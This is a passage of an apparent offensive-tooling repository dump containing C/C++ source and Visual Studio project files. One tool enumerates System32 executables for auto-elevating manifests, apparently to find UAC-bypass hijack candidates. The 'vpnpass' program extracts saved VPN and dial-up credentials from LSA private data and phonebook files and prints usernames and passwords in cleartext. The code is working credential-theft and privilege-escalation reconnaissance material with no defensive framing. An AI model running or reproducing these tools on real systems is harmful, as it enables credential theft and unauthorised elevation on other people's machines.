(strstr(manifest, "requireAdministrator")) 160 | { 161 | if (strstr(manifest, "true")) 162 | { 163 | _tprintf(_T("%s\n"), (TCHAR*)lParam); 164 | ParseImportTable((TCHAR*)lParam); 165 | } 166 | } 167 | 168 | UnlockResource(hResData); 169 | FreeResource(hResData); 170 | 171 | return TRUE; 172 | } 173 | 174 | void EnumDirectory(LPCTSTR lpszDir) 175 | { 176 | HANDLE hFind = NULL; 177 | WIN32_FIND_DATA wfd = { 0 }; 178 | TCHAR szTemp[MAX_PATH] = { 0 }; 179 | 180 | _stprintf(szTemp, _T("%s\\*"), lpszDir); 181 | 182 | hFind = FindFirstFile(szTemp, &wfd); 183 | if (hFind == INVALID_HANDLE_VALUE) 184 | return; 185 | 186 | do 187 | { 188 | if (_tcsicmp(wfd.cFileName, _T(".")) == 0 || _tcsicmp(wfd.cFileName, _T("..")) == 0) 189 | continue; 190 | 191 | if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) 192 | { 193 | TCHAR szSubDir[MAX_PATH] = { 0 }; 194 | _stprintf(szSubDir, _T("%s\\%s"), lpszDir, wfd.cFileName); 195 | EnumDirectory(szSubDir); 196 | } 197 | else 198 | { 199 | TCHAR szFile[MAX_PATH] = { 0 }; 200 | _stprintf(szFile, _T("%s\\%s"), lpszDir, wfd.cFileName); 201 | TCHAR* ext = PathFindExtension(szFile); 202 | if (_tcsicmp(ext, _T(".exe")) == 0) 203 | { 204 | HMODULE hModule = LoadLibraryEx(szFile, NULL, LOAD_LIBRARY_AS_DATAFILE); 205 | EnumResourceNames(hModule, RT_MANIFEST, EnumResourceNameCallback_Dir, (LONG_PTR)szFile); 206 | FreeLibrary(hModule); 207 | } 208 | } 209 | } while (FindNextFile(hFind, &wfd)); 210 | 211 | FindClose(hFind); 212 | } 213 | 214 | BOOL CALLBACK EnumResourceNameCallback_file(HMODULE hModule, LPCTSTR lpType, LPTSTR lpName, LONG_PTR lParam) 215 | { 216 | HRSRC hResInfo = FindResource(hModule, lpName, lpType); 217 | DWORD cbResource = SizeofResource(hModule, hResInfo); 218 | 219 | HGLOBAL hResData = LoadResource(hModule, hResInfo); 220 | const BYTE *pResource = (const BYTE *)LockResource(hResData); 221 | 222 | TCHAR filename[MAX_PATH]; 223 | if (IS_INTRESOURCE(lpName)) 224 | _stprintf_s(filename, _T("%s_#%d.manifest"), (char*)lParam, lpName); 225 | else 226 | _stprintf_s(filename, _T("%s_%s.manifest"), (char*)lParam, lpName); 227 | 228 | FILE *f = _tfopen(filename, _T("wb")); 229 | fwrite(pResource, cbResource, 1, f); 230 | fclose(f); 231 | 232 | UnlockResource(hResData); 233 | FreeResource(hResData); 234 | 235 | return TRUE; 236 | } 237 | 238 | void EnumFile(LPCTSTR file) 239 | { 240 | TCHAR* fileName = PathFindFileName(file); 241 | HMODULE hModule = LoadLibraryEx(file, NULL, LOAD_LIBRARY_AS_DATAFILE); 242 | EnumResourceNames(hModule, RT_MANIFEST, EnumResourceNameCallback_file, (LONG_PTR)fileName); 243 | FreeLibrary(hModule); 244 | } 245 | 246 | void _tmain(int argc, TCHAR* argv[]) 247 | { 248 | InitNtFunc(); 249 | if (_tcsicmp(argv[1], _T("-f")) == 0) 250 | EnumFile(argv[2]); 251 | else if (_tcsicmp(argv[1], _T("-d")) == 0) 252 | EnumDirectory(_T("C:\\Windows\\System32")); 253 | } -------------------------------------------------------------------------------- /uachijack/uachijack.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {F5593633-8560-4316-BBF2-8CC8D6080843} 23 | Win32Proj 24 | uac_hijack_find 25 | 8.1 26 | uachijack 27 | 28 | 29 | 30 | Application 31 | true 32 | v140 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v140 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v140 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v140 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | Disabled 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | 93 | 94 | Console 95 | true 96 | 97 | 98 | 99 | 100 | 101 | 102 | Level3 103 | Disabled 104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 105 | 106 | 107 | Console 108 | true 109 | 110 | 111 | 112 | 113 | Level3 114 | 115 | 116 | MaxSpeed 117 | true 118 | true 119 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | 121 | 122 | Console 123 | true 124 | true 125 | true 126 | 127 | 128 | 129 | 130 | Level3 131 | 132 | 133 | MaxSpeed 134 | true 135 | true 136 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 137 | 138 | 139 | Console 140 | true 141 | true 142 | true 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | -------------------------------------------------------------------------------- /uachijack/uachijack.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /vpnpass/vpnpass.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #pragma comment(lib, "Rasapi32.lib") 10 | #pragma comment(lib, "Wtsapi32.lib") 11 | 12 | typedef struct _tagRASDIALPINFO 13 | { 14 | CHAR szEntryName[RAS_MaxEntryName + 1]; 15 | CHAR szDeviceType[RAS_MaxDeviceType + 1]; 16 | CHAR szDeviceName[RAS_MaxDeviceName + 1]; 17 | CHAR szPhoneNumber[RAS_MaxPhoneNumber + 1]; 18 | CHAR szUserName[UNLEN + 1]; 19 | CHAR szPassword[PWLEN + 1]; 20 | }RASDIALPINFO, *PRASDIALPINFO; 21 | 22 | typedef struct _tagRASDIALPINFOLIST 23 | { 24 | ULONG ulCount; 25 | RASDIALPINFO rdi[1]; 26 | }RASDIALPINFOLIST, *PRASDIALPINFOLIST; 27 | 28 | typedef struct _tagPASSWORDS 29 | { 30 | CHAR uid[256]; 31 | CHAR pass[256]; 32 | CHAR login[256]; 33 | }PASSWORDS, *PPASSWORDS; 34 | 35 | const char* user = NULL; 36 | 37 | void StrToLsaStr(LPSTR AValue, PLSA_UNICODE_STRING lsa) 38 | { 39 | DWORD dwSize = 0; 40 | dwSize = MultiByteToWideChar(CP_ACP, NULL, AValue, -1, NULL, NULL); 41 | lsa->Length = (dwSize - 1) * 2; 42 | lsa->MaximumLength = lsa->Length; 43 | lsa->Buffer = (LPWSTR)malloc(lsa->MaximumLength); 44 | MultiByteToWideChar(CP_ACP, NULL, AValue, strlen(AValue), lsa->Buffer, dwSize - 1); 45 | } 46 | 47 | LPSTR get_local_sid() 48 | { 49 | union 50 | { 51 | SID s; 52 | char c[256]; 53 | }Sid; 54 | 55 | typedef BOOL(WINAPI *ConvertSid2StringSid)(PSID, LPTSTR*); 56 | 57 | DWORD dwSidSize = 0; 58 | DWORD dwDomainNameSize = 0; 59 | CHAR szDomainName[256] = { 0 }; 60 | 61 | LPSTR pSid = NULL; 62 | SID_NAME_USE peUse; 63 | 64 | HINSTANCE hLibrary = NULL; 65 | 66 | dwSidSize = sizeof(Sid); 67 | dwDomainNameSize = sizeof(szDomainName); 68 | 69 | if (!LookupAccountName(NULL, user, &Sid, &dwSidSize, szDomainName, &dwDomainNameSize, &peUse)) 70 | return NULL; 71 | 72 | if (!IsValidSid(&Sid)) 73 | return NULL; 74 | 75 | hLibrary = LoadLibrary("advapi32.dll"); 76 | if (hLibrary == NULL) 77 | return NULL; 78 | 79 | ConvertSid2StringSid proc = (ConvertSid2StringSid)GetProcAddress(hLibrary, "ConvertSidToStringSidA"); 80 | if (proc != NULL) 81 | { 82 | //Convert 83 | proc(&Sid.s, &pSid); 84 | FreeLibrary(hLibrary); 85 | return pSid; 86 | } 87 | else 88 | { 89 | FreeLibrary(hLibrary); 90 | return NULL; 91 | } 92 | 93 | return NULL; 94 | } 95 | 96 | PLSA_UNICODE_STRING get_lsa_data(LPTSTR KeyName) 97 | { 98 | NTSTATUS status; 99 | LSA_HANDLE LsaHandle; 100 | LSA_OBJECT_ATTRIBUTES LsaObjectAttribs = { 0 }; 101 | LSA_UNICODE_STRING LsaKeyName; 102 | PLSA_UNICODE_STRING OutData; 103 | 104 | status = LsaOpenPolicy(NULL, &LsaObjectAttribs, POLICY_GET_PRIVATE_INFORMATION, &LsaHandle); 105 | if (status != 0) 106 | return NULL; 107 | 108 | StrToLsaStr(KeyName, &LsaKeyName); 109 | 110 | status = LsaRetrievePrivateData(LsaHandle, &LsaKeyName, &OutData); 111 | 112 | free(LsaKeyName.Buffer); 113 | 114 | if (status != 0) 115 | return NULL; 116 | 117 | status = LsaClose(LsaHandle); 118 | 119 | if (status != 0) 120 | return NULL; 121 | 122 | return OutData; 123 | } 124 | 125 | void parse_lsa_data(PASSWORDS* pass, LPCWSTR Buffer, USHORT Length) 126 | { 127 | char AnsiPsw[1024] = { 0 }; 128 | int index = 0; 129 | WideCharToMultiByte(CP_ACP, 0, Buffer, Length / 2, AnsiPsw, sizeof(AnsiPsw), 0, 0); 130 | for (int i = 0; i < Length / 2 - 1; ++i) 131 | { 132 | for (int j = 0; j < 10; ++j) 133 | { 134 | switch (j) 135 | { 136 | case 0: 137 | strcpy(pass[index].uid, AnsiPsw + i); 138 | break; 139 | case 5: 140 | strcpy(pass[index].login, AnsiPsw + i); 141 | break; 142 | case 6: 143 | strcpy(pass[index].pass, AnsiPsw + i); 144 | break; 145 | } 146 | i += strlen(AnsiPsw + i) + 1; 147 | } 148 | ++index; 149 | } 150 | } 151 | 152 | void get_lsa_pass(PASSWORDS* pass) 153 | { 154 | char Win2k[] = "RasDialParams!%s#0"; 155 | char WinXP[] = "L$_RasDefaultCredentials#0"; 156 | char temp[256]; 157 | PLSA_UNICODE_STRING PrivateData = NULL; 158 | 159 | sprintf(temp, Win2k, get_local_sid()); 160 | 161 | PrivateData = get_lsa_data(temp); 162 | if (PrivateData != NULL) 163 | { 164 | parse_lsa_data(pass, PrivateData->Buffer, PrivateData->Length); 165 | LsaFreeMemory(&PrivateData); 166 | } 167 | 168 | PrivateData = get_lsa_data(WinXP); 169 | if (PrivateData != NULL) 170 | { 171 | parse_lsa_data(pass, PrivateData->Buffer, PrivateData->Length); 172 | LsaFreeMemory(&PrivateData); 173 | } 174 | } 175 | 176 | int get_item_count() 177 | { 178 | int nCount = 0; 179 | LPSTR lpszPhoneBook[2]; 180 | CHAR szSectionNames[1024] = { 0 }; 181 | CHAR szPhoneBook1[MAX_PATH], szPhoneBook2[MAX_PATH]; 182 | OSVERSIONINFO osi; 183 | 184 | osi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); 185 | GetVersionEx(&osi); 186 | 187 | switch (osi.dwMajorVersion) 188 | { 189 | case 5: 190 | sprintf(szPhoneBook1, "C:\\Documents and Settings\\%s\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk", user); 191 | break; 192 | default: 193 | sprintf(szPhoneBook1, "C:\\Users\\%s\\AppData\\Roaming\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk", user); 194 | } 195 | 196 | SHGetSpecialFolderPath(NULL, szPhoneBook2, 0x23, 0); 197 | sprintf(szPhoneBook2, "%s\\%s", szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"); 198 | 199 | lpszPhoneBook[0] = szPhoneBook1; 200 | lpszPhoneBook[1] = szPhoneBook2; 201 | 202 | for (int i = 0; i < _countof(lpszPhoneBook); i++) 203 | { 204 | memset(szSectionNames, 0, sizeof(szSectionNames)); 205 | GetPrivateProfileSectionNames(szSectionNames, sizeof(szSectionNames), lpszPhoneBook[i]); 206 | for (LPTSTR lpSection = szSectionNames; *lpSection != '\0'; lpSection += strlen(lpSection) + 1) 207 | nCount++; 208 | } 209 | 210 | return nCount; 211 | } 212 | 213 | PRASDIALPINFOLIST get_item_info() 214 | { 215 | CHAR szSectionNames[1024] = { 0 }; 216 | CHAR szPhoneBook1[MAX_PATH], szPhoneBook2[MAX_PATH]; 217 | LPSTR lpszPhoneBook[2]; 218 | DWORD dwRasCount = 0; 219 | DWORD dwIndex = 0; 220 | PRASDIALPINFOLIST pRdiList = NULL; 221 | OSVERSIONINFO osi; 222 | 223 | dwRasCount = get_item_count(); 224 | if (dwRasCount <= 0) 225 | return NULL; 226 | 227 | PASSWORDS* pass = new PASSWORDS[dwRasCount]; 228 | 229 | get_lsa_pass(pass); 230 | 231 | osi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); 232 | GetVersionEx(&osi); 233 | 234 | if (osi.dwMajorVersion < 5) 235 | return NULL; 236 | 237 | switch (osi.dwMajorVersion) 238 | { 239 | case 5: 240 | sprintf(szPhoneBook1, "C:\\Documents and Settings\\%s\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk", user); 241 | break; 242 | default: 243 | sprintf(szPhoneBook1, "C:\\Users\\%s\\AppData\\Roaming\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk", user); 244 | } 245 | 246 | SHGetSpecialFolderPath(NULL, szPhoneBook2, 0x23, 0); 247 | sprintf(szPhoneBook2, "%s\\%s", szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"); 248 | 249 | lpszPhoneBook[0] = szPhoneBook1; 250 | lpszPhoneBook[1] = szPhoneBook2; 251 | 252 | pRdiList = (PRASDIALPINFOLIST)LocalAlloc(LPTR, sizeof(RASDIALPINFO) * dwRasCount + sizeof(ULONG)); 253 | 254 | pRdiList->ulCount = dwRasCount; 255 | 256 | for (int i = 0; i < _countof(lpszPhoneBook); i++) 257 | { 258 | memset(szSectionNames, 0, sizeof(szSectionNames)); 259 | 260 | GetPrivateProfileSectionNames(szSectionNames, sizeof(szSectionNames), lpszPhoneBook[i]); 261 | 262 | for (LPTSTR lpSection = szSectionNames; *lpSection != '\0'; lpSection += strlen(lpSection) + 1) 263 | { 264 | char strDialParamsUID[256] = { 0 }; 265 | char strUserName[256] = { 0 }; 266 | char strPassWord[256] = { 0 }; 267 | char strPhoneNumber[256] = { 0 }; 268 | char strDevice[256] = { 0 }; 269 | 270 | int nBufferLen = GetPrivateProfileString(lpSection, "DialParamsUID", 0, strDialParamsUID, sizeof(strDialParamsUID), lpszPhoneBook[i]); 271 | 272 | if (nBufferLen > 0) 273 | { 274 | for (int j = 0; j < dwRasCount; j++) 275 | { 276 | if (stricmp(strDialParamsUID, pass[j].uid) == 0) 277 | { 278 | strcpy(strUserName, pass[j].login); 279 | strcpy(strPassWord, pass[j].pass); 280 | break; 281 | } 282 | } 283 | } 284 | 285 | GetPrivateProfileString(lpSection, "PhoneNumber", 0, strPhoneNumber, sizeof(strPhoneNumber), lpszPhoneBook[i]); 286 | GetPrivateProfileString(lpSection, "Device", 0, strDevice, sizeof(strDevice), lpszPhoneBook[i]); 287 | 288 | strcpy(pRdiList->rdi[dwIndex].szEntryName, lpSection); 289 | strcpy(pRdiList->rdi[dwIndex].szUserName, strUserName); 290 | strcpy(pRdiList->rdi[dwIndex].szPassword, strPassWord); 291 | strcpy(pRdiList->rdi[dwIndex].szPhoneNumber, strPhoneNumber); 292 | strcpy(pRdiList->rdi[dwIndex].szDeviceType, strDevice); 293 | strcpy(pRdiList->rdi[dwIndex].szDeviceName, strDevice); 294 | 295 | dwIndex++; 296 | } 297 | } 298 | 299 | return pRdiList; 300 | } 301 | 302 | void main(int argc, char** argv) 303 | { 304 | PRASDIALPINFOLIST pRdiList = NULL; 305 | 306 | user = argv[1]; 307 | 308 | pRdiList = get_item_info(); 309 | if (pRdiList == NULL) 310 | return; 311 | 312 | printf("name\tuser\tpassword\tphone\tdevname\tdevtype\n"); 313 | 314 | for (int i = 0; i < pRdiList->ulCount; i++) 315 | { 316 | CHAR* name = pRdiList->rdi[i].szEntryName; 317 | CHAR* user = pRdiList->rdi[i].szUserName; 318 | CHAR* password = pRdiList->rdi[i].szPassword; 319 | CHAR* phone = pRdiList->rdi[i].szPhoneNumber; 320 | CHAR* devname = pRdiList->rdi[i].szDeviceName; 321 | CHAR* devtype = pRdiList->rdi[i].szDeviceType; 322 | 323 | printf("%s\t%s\t%s\t%s\t%s\t%s\n", name, user, password, phone, devname, devtype); 324 | } 325 | 326 | LocalFree(pRdiList); 327 | } -------------------------------------------------------------------------------- /vpnpass/vpnpass.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49} 23 | Win32Proj 24 | vpnpass 25 | 8.1 26 | vpnpass 27 | 28 | 29 | 30 | Application 31 | true 32 | v140 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v140 39 | true 40 | MultiByte 41 | 42 | 43 | Application 44 | true 45 | v140 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v140 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | Disabled 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | 93 | 94 | Console 95 | true 96 | 97 | 98 | 99 | 100 | 101 | 102 | Level3 103 | Disabled 104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 105 | 106 | 107 | Console 108 | true 109 | 110 | 111 | 112 | 113 | Level3 114 | 115 | 116 | MaxSpeed 117 | true 118 | true 119 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | 121 | 122 | Console 123 | true 124 | true 125 | true 126 | 127 | 128 | 129 | 130 | Level3 131 | 132 | 133 | MaxSpeed 134 | true 135 | true 136 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 137 | 138 | 139 | Console 140 | true 141 | true 142 | true 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | -------------------------------------------------------------------------------- /vpnpass/vpnpass.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | --------------------------------------------------------------------------------